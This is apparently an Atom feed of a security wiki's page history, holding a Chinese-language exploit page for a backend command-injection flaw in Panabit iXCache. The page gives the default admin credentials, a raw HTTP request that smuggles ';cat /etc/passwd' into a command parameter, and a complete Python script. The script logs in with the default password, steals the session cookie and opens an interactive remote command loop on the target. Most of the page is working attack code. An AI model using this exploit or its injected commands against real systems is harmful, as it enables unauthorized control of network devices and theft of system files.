<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Panabit_iXCache_ajax_cmd_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>Panabit iXCache ajax cmd 後台命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Panabit_iXCache_ajax_cmd_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Panabit_iXCache_ajax_cmd_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T01:48:58Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Panabit_iXCache_ajax_cmd_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2738&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==默認賬戶密碼== admin/ixcache   ==漏洞利用==  進入後台後點擊命令行，訪問Url &lt;pre&gt; /cgi-bin/Maintain/cfg_cmd &lt;/pre&gt;  輸入命令時使用 ; 即可命...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Panabit_iXCache_ajax_cmd_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2738&amp;oldid=prev"/>
		<updated>2021-05-08T02:47:23Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==默認賬戶密碼== admin/ixcache   ==漏洞利用==  進入後台後點擊命令行，訪問Url &amp;lt;pre&amp;gt; /cgi-bin/Maintain/cfg_cmd &amp;lt;/pre&amp;gt;  輸入命令時使用 ; 即可命...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==默認賬戶密碼==&lt;br /&gt;
admin/ixcache&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
&lt;br /&gt;
進入後台後點擊命令行，訪問Url&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/cgi-bin/Maintain/cfg_cmd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
輸入命令時使用 ; 即可命令拼接執行任意命令&lt;br /&gt;
&lt;br /&gt;
[[File:Pa-3.png | 600px]]&lt;br /&gt;
&lt;br /&gt;
==Request==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /cgi-bin/Maintain/ajax_cmd?action=runcmd&amp;amp;cmd=ixeye%20;cat%20/etc/passwd HTTP/1.1&lt;br /&gt;
Host: &lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Length: 0&lt;br /&gt;
sec-ch-ua: &amp;quot; Not A;Brand&amp;quot;;v=&amp;quot;99&amp;quot;, &amp;quot;Chromium&amp;quot;;v=&amp;quot;90&amp;quot;, &amp;quot;Google Chrome&amp;quot;;v=&amp;quot;90&amp;quot;&lt;br /&gt;
Accept: */*&lt;br /&gt;
X-Requested-With: XMLHttpRequest&lt;br /&gt;
sec-ch-ua-mobile: ?0&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36&lt;br /&gt;
Sec-Fetch-Site: same-origin&lt;br /&gt;
Sec-Fetch-Mode: cors&lt;br /&gt;
Sec-Fetch-Dest: empty&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6&lt;br /&gt;
Cookie: _walkthrough-introduction=0; pauser_1615540522_368691=paonline_admin_73708_16196903931;Path=/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import random&lt;br /&gt;
import re&lt;br /&gt;
import base64&lt;br /&gt;
import time&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
&lt;br /&gt;
def title():&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')&lt;br /&gt;
    print('+  \033[34m公众号  : PeiQi文库                                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mTitle  : Panabit iXCache cfg_cmd 后台命令执行漏洞                   \033[0m')&lt;br /&gt;
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')&lt;br /&gt;
    print('+  \033[36mUrl         &amp;gt;&amp;gt;&amp;gt; http://xxx.xxx.xxx.xxx                             \033[0m')&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
&lt;br /&gt;
def POC_1(target_url):&lt;br /&gt;
    vuln_url = target_url + &amp;quot;/login/userverify.cgi&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot;,&lt;br /&gt;
    }&lt;br /&gt;
    data = &amp;quot;username=admin&amp;amp;password=ixcache&amp;quot;&lt;br /&gt;
    try:&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.post(url=vuln_url, headers=headers,data=data, verify=False, timeout=5)&lt;br /&gt;
        print(&amp;quot;\033[36m[o] 正在请求 {}/login/userverify.cgi.... \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
        if '/cgi-bin/monitor.cgi' in response.text and response.status_code == 200:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 目标 {} 存在默认口令 admin/ixcache \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
            cookie = response.headers['Set-Cookie']&lt;br /&gt;
            print(&amp;quot;\033[36m[o] 获取Cookie : {} \033[0m&amp;quot;.format(cookie))&lt;br /&gt;
            POC_2(target_url, cookie)&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;)&lt;br /&gt;
            sys.exit(0)&lt;br /&gt;
&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;, e)&lt;br /&gt;
&lt;br /&gt;
def POC_2(target_url, Cookie):&lt;br /&gt;
    vuln_url = target_url + &amp;quot;/cgi-bin/Maintain/ajax_cmd?action=runcmd&amp;amp;cmd=ixeye%20;cat%20/etc/passwd&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot;,&lt;br /&gt;
        &amp;quot;Cookie&amp;quot;: &amp;quot;_walkthrough-introduction=0;{}&amp;quot;.format(Cookie)&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.post(url=vuln_url, headers=headers, verify=False, timeout=5)&lt;br /&gt;
        if 'root' in response.text and response.status_code == 200:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 目标 {}存在漏洞 ,执行 cat /etc/passwd \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
            print(&amp;quot;\033[36m[o] 响应为:\n{} \033[0m&amp;quot;.format(response.text))&lt;br /&gt;
            while True:&lt;br /&gt;
                Cmd = input(&amp;quot;\033[35mCmd &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;)&lt;br /&gt;
                if Cmd == &amp;quot;exit&amp;quot;:&lt;br /&gt;
                    sys.exit(0)&lt;br /&gt;
                else:&lt;br /&gt;
                    POC_3(target_url, Cmd, Cookie)&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;, e)&lt;br /&gt;
&lt;br /&gt;
def POC_3(target_url, Cmd, Cookie):&lt;br /&gt;
    Cmd = Cmd.replace(&amp;quot; &amp;quot;, &amp;quot;%20&amp;quot;)&lt;br /&gt;
    vuln_url = target_url + &amp;quot;/cgi-bin/Maintain/ajax_cmd?action=runcmd&amp;amp;cmd=ixeye%20;{}&amp;quot;.format(Cmd)&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot;,&lt;br /&gt;
        &amp;quot;Cookie&amp;quot;: &amp;quot;_walkthrough-introduction=0;{}&amp;quot;.format(Cookie)&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.post(url=vuln_url, headers=headers, verify=False, timeout=5)&lt;br /&gt;
        print(&amp;quot;\033[36m[o] 响应为:\n{} \033[0m&amp;quot;.format(response.text))&lt;br /&gt;
&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;, e)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    title()&lt;br /&gt;
    target_url = str(input(&amp;quot;\033[35mPlease input Attack Url\nUrl &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
    POC_1(target_url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==參考==&lt;br /&gt;
https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Panabit/Panabit%20iXCache%20cfg_cmd%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>